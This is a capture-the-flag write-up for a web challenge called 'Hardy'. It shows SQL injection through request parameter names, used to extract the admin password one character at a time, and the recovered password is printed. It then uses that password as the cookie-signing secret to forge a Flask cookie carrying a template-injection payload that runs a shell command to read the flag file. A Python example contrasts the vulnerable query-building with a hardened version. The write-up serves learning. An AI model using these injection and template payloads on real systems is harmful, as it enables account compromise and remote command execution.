Web - Hardy
No source code was provided
Solution
The parameter names (not just their values) are vulnerable to SQL injection.
Dumping the admin password
username=admin&SUBSTRING(password,1,1)=I
username=admin&SUBSTRING(password,1,2)=IL
username=admin&SUBSTRING(password,1,3)=ILI
Extending the matched prefix one character at a time gives the admin password: ILIKEpotatoesSOMUCH::&&
The password is also used as the JWT secret, and the application is vulnerable to SSTI through the type field of the signed cookie: {'type':'{{<payload>}}'}
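The root cause on the SQL side, shown as an added example (not code from the challenge, whose source was not provided): a login handler that pastes form keys into the query text, next to a hardened version that only accepts the expected keys. The table layout, function names and sample password are assumptions, and SQLite's substr() stands in for SUBSTRING().

```python
import sqlite3

EXPECTED_KEYS = {"username", "password"}  # assumed form fields


def make_db():
    """Build a constructed in-memory users table (not the challenge data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'Constructed-Secret')")
    return db


def login_vulnerable(db, form):
    # Values are bound as parameters, but each key is copied into the SQL
    # text, so a key such as "substr(password,1,1)" becomes an expression
    # and the login result reveals whether the guessed prefix was right.
    where = " AND ".join(f"{key} = ?" for key in form)
    sql = f"SELECT username FROM users WHERE {where}"
    return db.execute(sql, list(form.values())).fetchone()


def login_hardened(db, form):
    # Reject any request whose keys are not exactly the expected fields,
    # and never build SQL text from request data.
    if set(form) != EXPECTED_KEYS:
        raise ValueError(f"unexpected parameters: {sorted(set(form) ^ EXPECTED_KEYS)}")
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    # A real login would compare against a stored password hash instead.
    return db.execute(sql, (form["username"], form["password"])).fetchone()


if __name__ == "__main__":
    db = make_db()
    probe = {"username": "admin", "substr(password,1,1)": "C"}
    print("vulnerable:", login_vulnerable(db, probe))
    try:
        login_hardened(db, probe)
    except ValueError as exc:
        print("hardened:", exc)
```

Keeping the password out of any other role (such as a cookie signing secret) limits what a leak like this exposes.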
The Flag
flask-unsign --sign \
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"